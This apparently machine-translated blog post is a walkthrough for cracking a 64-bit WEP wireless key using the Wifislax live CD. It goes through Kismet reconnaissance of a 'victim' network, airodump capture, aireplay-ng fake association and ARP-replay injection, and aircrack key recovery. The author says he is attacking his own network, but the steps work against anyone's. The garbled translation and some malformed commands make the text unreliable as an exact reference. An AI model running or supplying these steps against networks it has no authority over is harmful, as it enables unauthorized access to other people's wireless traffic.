So I will try to explain is how to get the keys to wireless networks, for instance, based on a key to break a 64-bit WEP encryption, I recommend reading some sort of encryption on wireless networks to learn best when they attack such a network.
Note: images can be seen that the edit to not show the MAC addresses and to avoid problems if
Let's see how we can get keys for wireless networks, for example based on me hack my own network.
Material used:
cd wifislax 2.0
wireless card: Ather0s
RAM size: 256mb (enought)
Well, the first thing we must do once in our state and live cd is put in our way tareta monitor, for that we will:
Menu> Wifislax> Support Chipset> Support Chipset Ather0s> Create interface (Monitor Mode)
Well, now that is run by Kismet to see which channel the network is a victim, the Mac and the type of encryption.
Menu> Wifislax> Wireless Tools> Monitoring wireless (Kismet)
in rt2500 driver and I choose to apply.
screen when you start kismet type the key and then type the letter "s" 2 times
Enter key on the victim network:
and record the data that interest us:
ssd, BSSID, chanel and Encrypt:
can see in the image that the SSID (network name) is Th3r0rn, the BSSID is the MAC, we also see that the channel through which it travels the network 6 and also that the type of encryption is WEP.
Once we have this data already recorded, left by pressing "Q" after the victim on the same network, type the letter "C" to see this machine connected to the network via wireless clear :-)
Well now we closed the Kismet window and run a new shell, since we have our next shell will be run airodump, for this is to run if:
airodump ath0 th3r0rn 6
explain the syntax: airodump where we call the program, which is our ath0 wireless interface, where th3r0rn is the name of the file format that genre. or cap. IVS can put the name you want, and where 6 is the airodump channel which will capture traffic by filtering all other channels as soon as we saw on the screen of kisme our network victim travels through the channel 6.
Now we have to do is associate to the network to inject traffic. aireplay run for it, the syntax is:
aireplay -1 0 -e ESSID -a BSSID ath0 -h STAtion
thus:
run:
aireplay-ng -1 0 -e Th3r0rn
MAC -h STATION ath0as a result we see that we can associate to the network correctly:
the following is now accelerated network traffic, traffic with aireplay for injections:
Its syntax is:
aireplay-ng -3 -b MAC -h STATION ath0
where we recall that our interface is ath0, then run just sit and wait to inject the traffic necessary to obtain our key wep: -)
since we have captured more 250mil iv's (needed to break a 64 bit wep, aircrack can run to get the key.
syntax:
aircrack file.cap
observe the network has 303,404 victim's IV
and that his ID number is "1"
by which type 1 and we enter
and Bingooo!
We have the key!
where the image shows me and my aircrack 303404 IV q's are shown using 2 file.cap this is that I had to do something for which the capture of stopped traffic when finished and capture what I needed
assume that the number of data capture to get the key of the network will depend on what type of encryption as that is
No comments:
Post a Comment